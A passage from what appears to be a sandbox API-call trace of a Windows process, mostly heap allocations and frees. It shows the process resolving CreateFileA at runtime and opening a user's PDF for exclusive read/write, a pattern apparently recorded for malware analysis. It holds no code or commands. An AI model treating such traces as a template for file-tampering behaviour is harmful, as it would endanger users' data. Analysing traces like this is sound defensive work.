hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.545] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cb38 [0035.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cb38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.545] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0035.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cb38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.546] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", cchWideChar=103, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 103 [0035.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x67) returned 0x7c10a8 [0035.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", cchWideChar=103, lpMultiByteStr=0x7c10a8, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpUsedDefaultChar=0x0) returned 103 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.546] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\3p0co4o-wsrfvd3saei.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=103, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xce) returned 0x791190 [0035.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=103, lpWideCharStr=0x791190, cchWideChar=103 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf") returned 103 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0035.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.549] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.550] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.550] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.551] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.551] RtlAllocateHeap (HeapHandle=0x770000, 